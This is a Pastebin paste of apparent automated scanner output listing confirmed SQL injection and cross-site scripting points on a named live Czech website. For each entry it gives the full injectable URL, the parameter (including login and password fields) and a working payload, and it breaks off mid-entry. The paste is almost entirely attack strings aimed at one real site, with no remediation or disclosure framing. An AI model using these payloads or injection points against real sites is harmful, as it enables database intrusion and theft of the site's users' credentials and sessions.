API tools faq
paste
Advertisement
sroub3k

prdel.cz

sroub3k
Apr 6th, 2013
751
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.22 KB | None | 0 0
raw download clone embed print report
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  6. URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  7. Parameter Name: rub
  8. Parameter Type: Querystring
  9. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://www.prdel.cz/clanek.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  14. Parameter Name: id
  15. Parameter Type: Querystring
  16. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  17.  
  18. Severity: Critical
  19. Confirmation: Confirmed
  20. URL: http://www.prdel.cz/kom_info.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  21. Parameter Name: id
  22. Parameter Type: Querystring
  23. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  24.  
  25. Severity: Critical
  26. Confirmation: Confirmed
  27. URL: http://www.prdel.cz/prispevky.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  28. Parameter Name: id
  29. Parameter Type: Querystring
  30. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  31.  
  32. Severity: Critical
  33. Confirmation: Confirmed
  34. URL: http://www.prdel.cz/rubrika.php?s=18&rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  35. Parameter Name: rub
  36. Parameter Type: Querystring
  37. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  38.  
  39. Severity: Critical
  40. Confirmation: Confirmed
  41. URL: http://www.prdel.cz/horoskop.php?h=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  42. Parameter Name: h
  43. Parameter Type: Querystring
  44. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  45.  
  46. Severity: Critical
  47. Confirmation: Confirmed
  48. URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&vypsat=1
  49. Parameter Name: id
  50. Parameter Type: Querystring
  51. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  52.  
  53. Severity: Critical
  54. Confirmation: Confirmed
  55. URL: http://www.prdel.cz/prispevky.php?s=20&id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  56. Parameter Name: id
  57. Parameter Type: Querystring
  58. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  59.  
  60. Severity: Critical
  61. Confirmation: Confirmed
  62. URL: http://www.prdel.cz/clanek.php?id=122
  63. Parameter Name: id
  64. Parameter Type: Post
  65. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  66.  
  67. Severity: Critical
  68. Confirmation: Confirmed
  69. URL: http://www.prdel.cz/prispevky.php?id=168
  70. Parameter Name: id
  71. Parameter Type: Post
  72. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  73.  
  74. Severity: Critical
  75. Confirmation: Confirmed
  76. URL: http://www.prdel.cz/prispevky.php?id=168
  77. Parameter Name: jmeno
  78. Parameter Type: Post
  79. Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
  80.  
  81. ||| Boolean Based SQL Injection
  82.  
  83. Severity: Critical
  84. Confirmation: Confirmed
  85. URL: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
  86. Parameter Name: id
  87. Parameter Type: Querystring
  88. Attack Pattern: -1 OR 17-7=10
  89.  
  90. ||| [High Possibility] SQL Injection
  91.  
  92. Severity: Critical
  93. Confirmation: Confirmed
  94. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  95. URL: http://www.prdel.cz/rubrika.php?rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  96. Parameter Name: rub
  97. Parameter Type: Querystring
  98. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  99.  
  100. Severity: Critical
  101. Confirmation: Confirmed
  102. URL: http://www.prdel.cz/clanek.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  103. Parameter Name: id
  104. Parameter Type: Querystring
  105. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  106.  
  107. Severity: Critical
  108. Confirmation: Confirmed
  109. URL: http://www.prdel.cz/kom_info.php?id=%27
  110. Parameter Name: id
  111. Parameter Type: Querystring
  112. Attack Pattern: %27
  113.  
  114. Severity: Critical
  115. Confirmation: Confirmed
  116. URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  117. Parameter Name: id
  118. Parameter Type: Querystring
  119. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  120.  
  121. Severity: Critical
  122. Confirmation: Confirmed
  123. URL: http://www.prdel.cz/prispevky.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  124. Parameter Name: id
  125. Parameter Type: Querystring
  126. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  127.  
  128. Severity: Critical
  129. Confirmation: Confirmed
  130. URL: http://www.prdel.cz/clanek.php?id=122
  131. Parameter Name: heslo
  132. Parameter Type: Post
  133. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  134.  
  135. Severity: Critical
  136. Confirmation: Confirmed
  137. URL: http://www.prdel.cz/rubrika.php?s=18&rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  138. Parameter Name: rub
  139. Parameter Type: Querystring
  140. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  141.  
  142. Severity: Critical
  143. Confirmation: Confirmed
  144. URL: http://www.prdel.cz/clanek.php?id=122
  145. Parameter Name: id
  146. Parameter Type: Post
  147. Attack Pattern: '+NSFTW+'
  148.  
  149. Severity: Critical
  150. Confirmation: Confirmed
  151. URL: http://www.prdel.cz/clanek.php?id=122
  152. Parameter Name: jmeno
  153. Parameter Type: Post
  154. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  155.  
  156. Severity : Critical
  157. Confirmation: Confirmed
  158. URL: http://www.prdel.cz/clanek.php?id=122
  159. Parameter Name: jmeno
  160. Parameter Type: Post
  161. Attack Pattern: '+NSFTW+'
  162.  
  163. Severity: Critical
  164. Confirmation: Confirmed
  165. URL: http://www.prdel.cz/horoskop.php?h=%27
  166. Parameter Name: h
  167. Parameter Type: Querystring
  168. Attack Pattern: %27
  169.  
  170. Severity: Critical
  171. Confirmation: Confirmed
  172. URL: http://www.prdel.cz/kom_info.php?id=%27&vypsat=1
  173. Parameter Name: id
  174. Parameter Type: Querystring
  175. Attack Pattern: %27
  176.  
  177. Severity: Critical
  178. Confirmation: Confirmed
  179. URL: http://www.prdel.cz/prispevky.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  180. Parameter Name: id
  181. Parameter Type: Querystring
  182. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  183.  
  184. Severity: Critical
  185. Confirmation: Confirmed
  186. URL: http://www.prdel.cz/clanek.php?id=122
  187. Parameter Name: id
  188. Parameter Type: Post
  189. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  190.  
  191. Severity: Critical
  192. Confirmation: Confirmed
  193. URL: http://www.prdel.cz/prispevky.php?id='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  194. Parameter Name: id
  195. Parameter Type: Querystring
  196. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  197.  
  198. Severity: Critical
  199. Confirmation: Confirmed
  200. URL: http://www.prdel.cz/prispevky.php?id=168
  201. Parameter Name: jmeno
  202. Parameter Type: Post
  203. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  204.  
  205. Severity: Critical
  206. Confirmation: Confirmed
  207. URL: http://www.prdel.cz/prispevky.php?id=168
  208. Parameter Name: jmeno
  209. Parameter Type: Post
  210. Attack Pattern: '+NSFTW+'
  211.  
  212. Severity: Critical
  213. Confirmation: Confirmed
  214. URL: http://www.prdel.cz/prispevky.php?id=168
  215. Parameter Name: heslo
  216. Parameter Type: Post
  217. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  218.  
  219. Severity: Critical
  220. Confirmation: Confirmed
  221. URL: http://www.prdel.cz/prispevky.php?id=168
  222. Parameter Name: heslo
  223. Parameter Type: Post
  224. Attack Pattern: '+NSFTW+'
  225.  
  226. Severity: Critical
  227. Confirmation: Confirmed
  228. URL: http://www.prdel.cz/reg_edit.php
  229. Parameter Name: login
  230. Parameter Type: Post
  231. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  232.  
  233. Severity: Critical
  234. Confirmation: Confirmed
  235. URL: http://www.prdel.cz/reg_edit.php
  236. Parameter Name: sheslo
  237. Parameter Type: Post
  238. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  239.  
  240. Severity: Critical
  241. Confirmation: Confirmed
  242. URL: http://www.prdel.cz/reg_edit.php
  243. Parameter Name: sheslo
  244. Parameter Type: Post
  245. Attack Pattern: '+NSFTW+'
  246.  
  247. Severity: Critical
  248. Confirmation: Confirmed
  249. URL: http://www.prdel.cz/reg_zapom.php
  250. Parameter Name: login
  251. Parameter Type: Post
  252. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  253.  
  254. Severity: Critical
  255. Confirmation: Confirmed
  256. URL: http://www.prdel.cz/kom_info.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&vypsat=3
  257. Parameter Name: id
  258. Parameter Type: Querystring
  259. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  260.  
  261. Severity: Critical
  262. Confirmation: Confirmed
  263. URL: http://www.prdel.cz/prispevky.php?id=168
  264. Parameter Name: id
  265. Parameter Type: Post
  266. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  267.  
  268. Severity: Critical
  269. Confirmation: Confirmed
  270. URL: http://www.prdel.cz/prispevky.php?id=168
  271. Parameter Name: id
  272. Parameter Type: Post
  273. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  274.  
  275. Severity: Critical
  276. Confirmation: Confirmed
  277. URL: http://www.prdel.cz/prispevky.php?id=168
  278. Parameter Name: id
  279. Parameter Type: Post
  280. Attack Pattern: '+NSFTW+'
  281.  
  282. ||| XSS (Cross-site Scripting)
  283.  
  284. Severity: Important
  285. Confirmation: Confirmed
  286. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  287. URL: http://www.prdel.cz/rubrika.php?rub='"--></style></script><script>alert(0x000090)</script>
  288. Parameter Name: rub
  289. Parameter Type: Querystring
  290. Attack Pattern: '"--></style></script><script>alert(0x000090)</script>
  291.  
  292. Severity: Important
  293. Confirmation: Confirmed
  294. URL: http://www.prdel.cz/clanek.php?id=122'"--></style></script><script>alert(0x0000B1)</script>
  295. Parameter Name: id
  296. Parameter Type: Querystring
  297. Attack Pattern: 122'"--></style></script><script>alert(0x0000B1)</script>
  298.  
  299. Severity: Important
  300. Confirmation: Confirmed
  301. URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x00013C)</script>
  302. Parameter Name: id
  303. Parameter Type: Querystring
  304. Attack Pattern: '"--></style></script><script>alert(0x00013C)</script>
  305.  
  306. Severity: Important
  307. Confirmation: Confirmed
  308. URL: http://www.prdel.cz/prispevky.php?id='"--></style></script><script>alert(0x000177)</script>
  309. Parameter Name: id
  310. Parameter Type: Querystring
  311. Attack Pattern: '"--></style></script><script>alert(0x000177)</script>
  312.  
  313. Severity: Important
  314. Confirmation: Confirmed
  315. URL: http://www.prdel.cz/clanek.php?id=122
  316. Parameter Name: heslo
  317. Parameter Type: Post
  318. Attack Pattern: '"--></style></script><script>alert(0x000231)</script>
  319.  
  320. Severity: Important
  321. Confirmation: Confirmed
  322. URL: http://www.prdel.cz/clanek.php?id=122
  323. Parameter Name: id
  324. Parameter Type: Post
  325. Attack Pattern: 122'"--></style></script><script>alert(0x000236)</script>
  326.  
  327. Severity: Important
  328. Confirmation: Confirmed
  329. URL: http://www.prdel.cz/rubrika.php?s=18&rub='"--></style></script><script>alert(0x00024D)</script>
  330. Parameter Name: rub
  331. Parameter Type: Querystring
  332. Attack Pattern: '"--></style></script><script>alert(0x00024D)</script>
  333.  
  334. Severity: Important
  335. Confirmation: Confirmed
  336. URL: http://www.prdel.cz/registrace.php
  337. Parameter Name: id
  338. Parameter Type: Post
  339. Attack Pattern: '"--></style></script><script>alert(0x00028D)</script>
  340.  
  341. Severity: Important
  342. Confirmation: Confirmed
  343. URL: http://www.prdel.cz/registrace.php
  344. Parameter Name: login
  345. Parameter Type: Post
  346. Attack Pattern: '"--></style></script><script>alert(0x00028E)</script>
  347.  
  348. Severity: Important
  349. Confirmation: Confirmed
  350. URL: http://www.prdel.cz/registrace.php
  351. Parameter Name: mail
  352. Parameter Type: Post
  353. Attack Pattern: '"--></style></script><script>alert(0x00028F)</script>
  354.  
  355. Severity: Important
  356. Confirmation: Confirmed
  357. URL: http://www.prdel.cz/centrum.php
  358. Parameter Name: centrum
  359. Parameter Type: Post
  360. Attack Pattern: '"--></style></script><script>alert(0x0002B1)</script>
  361.  
  362. Severity: Important
  363. Confirmation: Confirmed
  364. URL: http://www.prdel.cz/centrum.php
  365. Parameter Name: centrum
  366. Parameter Type: Post
  367. Attack Pattern: '"--></style></script><script>alert(0x0002F7)</script>
  368.  
  369. Severity: Important
  370. Confirmation: Confirmed
  371. URL: http://www.prdel.cz/registrace.php
  372. Parameter Name: login
  373. Parameter Type: Post
  374. Attack Pattern: '"--></style></script><script>alert(0x00031D)</script>
  375.  
  376. Severity: Important
  377. Confirmation: Confirmed
  378. URL: http://www.prdel.cz/registrace.php
  379. Parameter Name: mail
  380. Parameter Type: Post
  381. Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
  382.  
  383. Severity: Important
  384. Confirmation: Confirmed
  385. URL: http://www.prdel.cz/clanek.php?id=122
  386. Parameter Name: text
  387. Parameter Type: Post
  388. Attack Pattern: '"--></style></script><script>alert(0x000312)</script>
  389.  
  390. Severity: Important
  391. Confirmation: Confirmed
  392. URL: http://www.prdel.cz/clanek.php?id=122
  393. Parameter Name: jmeno
  394. Parameter Type: Post
  395. Attack Pattern: '"--></style></script><script>alert(0x000351)</script>
  396.  
  397. Severity: Important
  398. Confirmation: Confirmed
  399. URL: http://www.prdel.cz/clanek.php?id=122
  400. Parameter Name: heslo
  401. Parameter Type: Post
  402. Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
  403.  
  404. Severity: Important
  405. Confirmation: Confirmed
  406. URL: http://www.prdel.cz/clanek.php?id=122
  407. Parameter Name: mail
  408. Parameter Type: Post
  409. Attack Pattern: '"--></style></script><script>alert(0x000353)</script>
  410.  
  411. Severity: Important
  412. Confirmation: Confirmed
  413. URL: http://www.prdel.cz/clanek.php?id=122
  414. Parameter Name: vec
  415. Parameter Type: Post
  416. Attack Pattern: '"--></style></script><script>alert(0x000356)</script>
  417.  
  418. Severity: Important
  419. Confirmation: Confirmed
  420. URL: http://www.prdel.cz/ankety.php?s=15&rub='"--></style></script><script>alert(0x000379)</script>
  421. Parameter Name: rub
  422. Parameter Type: Querystring
  423. Attack Pattern: '"--></style></script><script>alert(0x000379)</script>
  424.  
  425. Severity: Important
  426. Confirmation: Confirmed
  427. URL: http://www.prdel.cz/horoskop.php?h='"--></style></script><script>alert(0x000380)</script>
  428. Parameter Name: h
  429. Parameter Type: Querystring
  430. Attack Pattern: '"--></style></script><script>alert(0x000380)</script>
  431.  
  432. Severity: Important
  433. Confirmation: Confirmed
  434. URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x0003E5)</script>&vypsat=1
  435. Parameter Name: id
  436. Parameter Type: Querystring
  437. Attack Pattern: '"--></style></script><script>alert(0x0003E5)</script>
  438.  
  439. Severity: Important
  440. Confirmation: Confirmed
  441. URL: http://www.prdel.cz/prispevky.php?s=20&id='"--></style></script><script>alert(0x000400)</script>
  442. Parameter Name: id
  443. Parameter Type: Querystring
  444. Attack Pattern: '"--></style></script><script>alert(0x000400)</script>
  445.  
  446. Severity: Important
  447. Confirmation: Confirmed
  448. URL: http://www.prdel.cz/clanek.php?id=122
  449. Parameter Name: text
  450. Parameter Type: Post
  451. Attack Pattern: '"><net sparker=alert(0x00037F)>
  452.  
  453. Severity: Important
  454. Confirmation: Confirmed
  455. URL: http://www.prdel.cz/prispevky.php?id=168
  456. Parameter Name: jmeno
  457. Parameter Type: Post
  458. Attack Pattern: '"--></style></script><script>alert(0x000439)</script>
  459.  
  460. Severity: Important
  461. Confirmation: Confirmed
  462. URL: http://www.prdel.cz/prispevky.php?id=168
  463. Parameter Name: heslo
  464. Parameter Type: Post
  465. Attack Pattern: '"--></style></script><script>alert(0x00041E)</script>
  466.  
  467. Severity: Important
  468. Confirmation : Confirmed
  469. URL: http://www.prdel.cz/prispevky.php?id=168
  470. Parameter Name: heslo
  471. Parameter Type: Post
  472. Attack Pattern: '"--></style></script><script>alert(0x00043A)</script>
  473.  
  474. Severity: Important
  475. Confirmation: Confirmed
  476. URL: http://www.prdel.cz/prispevky.php?id=168
  477. Parameter Name: mail
  478. Parameter Type: Post
  479. Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
  480.  
  481. Severity: Important
  482. Confirmation: Confirmed
  483. URL: http://www.prdel.cz/prispevky.php?id=168
  484. Parameter Name: vec
  485. Parameter Type: Post
  486. Attack Pattern: '"--></style></script><script>alert(0x00043C)</script>
  487.  
  488. Severity: Important
  489. Confirmation: Confirmed
  490. URL: http://www.prdel.cz/prispevky.php?id=168
  491. Parameter Name: id
  492. Parameter Type: Post
  493. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  494.  
  495. Severity: Important
  496. Confirmation: Confirmed
  497. URL: http://www.prdel.cz/prispevky.php?id=168
  498. Parameter Name: jmeno
  499. Parameter Type: Post
  500. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  501.  
  502. Severity: Important
  503. Confirmation: Confirmed
  504. URL: http://www.prdel.cz/reg_edit.php
  505. Parameter Name: login
  506. Parameter Type: Post
  507. Attack Pattern: '"--></style></script><script>alert(0x0004AA)</script>
  508.  
  509. Severity: Important
  510. Confirmation: Confirmed
  511. URL: http://www.prdel.cz/reg_edit.php
  512. Parameter Name: mail
  513. Parameter Type: Post
  514. Attack Pattern: '"--></style></script><script>alert(0x0004AB)</script>
  515.  
  516. Severity: Important
  517. Confirmation: Confirmed
  518. URL: http://www.prdel.cz/reg_edit.php
  519. Parameter Name: sheslo
  520. Parameter Type: Post
  521. Attack Pattern: '"--></style></script><script>alert(0x0004CC)</script>
  522.  
  523. Severity: Important
  524. Confirmation: Confirmed
  525. URL: http://www.prdel.cz/reg_zapom.php
  526. Parameter Name: login
  527. Parameter Type: Post
  528. Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
  529.  
  530. Severity: Important
  531. Confirmation: Confirmed
  532. URL: http://www.prdel.cz/kom_info.php?s=20&id='"--></style></script><script>alert(0x00052D)</script>&vypsat=3
  533. Parameter Name: id
  534. Parameter Type: Querystring
  535. Attack Pattern: '"--></style></script><script>alert(0x00052D)</script>
  536.  
  537. Severity: Important
  538. Confirmation: Confirmed
  539. URL: http://www.prdel.cz/kom_info.php?s=20&id=2&vypsat=3'"--></style></script><script>alert(0x000530)</script>
  540. Parameter Name: vypsat
  541. Parameter Type: Querystring
  542. Attack Pattern: 3'"--></style></script><script>alert(0x000530)</script>
  543.  
  544. Severity: Important
  545. Confirmation: Confirmed
  546. URL: http://www.prdel.cz/prispevky.php?id=168
  547. Parameter Name: text
  548. Parameter Type: Post
  549. Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
  550.  
  551. ||| [Possible] Cross-site Scripting
  552.  
  553. Severity : Medium
  554. Confirmation: Confirmed
  555. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  556.  
  557. URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x00009C)</script>
  558.  
  559. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable
  560. in many conditions however it still indicates lack of correct filtering and should be addressed.
  561.  
  562. Parameter Name: id
  563. Parameter Type: Querystring
  564. Attack Pattern: '"--></style></script><script>netsparker(0x00009C)</script>
  565.  
  566. Severity : Medium
  567. Confirmation: Confirmed
  568. URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x000201)</script>
  569. Parameter Name: id
